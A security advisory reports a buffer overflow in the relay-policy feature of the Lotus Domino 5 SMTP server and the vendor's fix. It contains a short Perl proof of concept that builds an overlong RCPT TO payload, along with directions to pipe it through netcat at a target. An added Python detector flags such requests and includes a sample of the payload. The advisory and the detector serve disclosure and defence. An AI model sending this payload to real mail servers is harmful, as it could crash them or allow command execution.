Reported January 23, 2001, by S.A.F.E.R.
VERSIONS AFFECTED
- Lotus Domino Notes Server 5 and 5.05
DESCRIPTION
Lotus Domino SMTP Server contains a policy feature that you can use to
prevent email relaying. However, an attacker can use a vulnerability in
this policy feature to overflow a buffer and possibly launch arbitrary
commands.
DEMONSTRATION
S.A.F.E.R. supplied the following proof-of-concept code:
-- cut --
#!/usr/bin/perl
$req="a" . "%A"x200 . "A"x600 . "%allowed.domain.com\@allowed.domain.com";
print "ehlo foo\nmail from: blah\@example.com\nrcpt to:$req\ndata\nfoo\n.\nquit\n";
-- cut --
Simply replace “allowed.domain.com” with the domain name running Lotus Notes
SMTP Server, and pipe the output through netcat.
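For detection on a mail gateway or in SMTP session logs, the request above stands out by its RCPT TO argument alone. The following is an added example, not part of the S.A.F.E.R. advisory: it flags RCPT TO paths that exceed the RFC 5321 size limits or carry repeated "%" routing. The function names, the one-"%" threshold and the sample session are assumptions made for illustration.

```python
import re

# Size limits from RFC 5321 section 4.5.3.1 (octets).
MAX_PATH = 256
MAX_LOCAL_PART = 64
# Assumption: more than one '%' source-route hop is treated as suspicious.
MAX_PERCENT = 1

# Captures the address after RCPT TO:, with or without angle brackets.
RCPT_RE = re.compile(r"^\s*RCPT\s+TO:\s*<?([^>\r\n]*)>?", re.IGNORECASE)


def check_rcpt(line):
    """Return the reasons a RCPT TO argument looks abusive.

    Returns [] for a clean recipient or for any other SMTP command.
    """
    m = RCPT_RE.match(line)
    if not m:
        return []
    path = m.group(1).strip()
    local = path.rsplit("@", 1)[0]  # everything before the final '@'
    reasons = []
    if len(path) > MAX_PATH:
        reasons.append("path-too-long")
    if len(local) > MAX_LOCAL_PART:
        reasons.append("local-part-too-long")
    if local.count("%") > MAX_PERCENT:
        reasons.append("percent-routing")
    return reasons


def scan_session(lines):
    """Return (line_number, reasons) for every flagged command in a session."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := check_rcpt(line))]


# Constructed sample session; the last RCPT has the shape of the request above.
SAMPLE = [
    "EHLO client.example.net",
    "MAIL FROM:<alice@example.com>",
    "RCPT TO:<bob@example.org>",
    "RCPT TO:<bob%inner.example.org@relay.example.org>",
    "rcpt to:" + "a" + "%A" * 200 + "A" * 600 + "%mail.example.org@mail.example.org",
    "DATA",
]
```

A single "%" hop is left unflagged here so that legacy percent-routed addresses do not alert; lower MAX_PERCENT to 0 if the site does not use them.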
VENDOR RESPONSE
Lotus was informed of this vulnerability on November 2, 2000, and has fixed this
issue in release 5.06.
CREDIT
Discovered by S.A.F.E.R.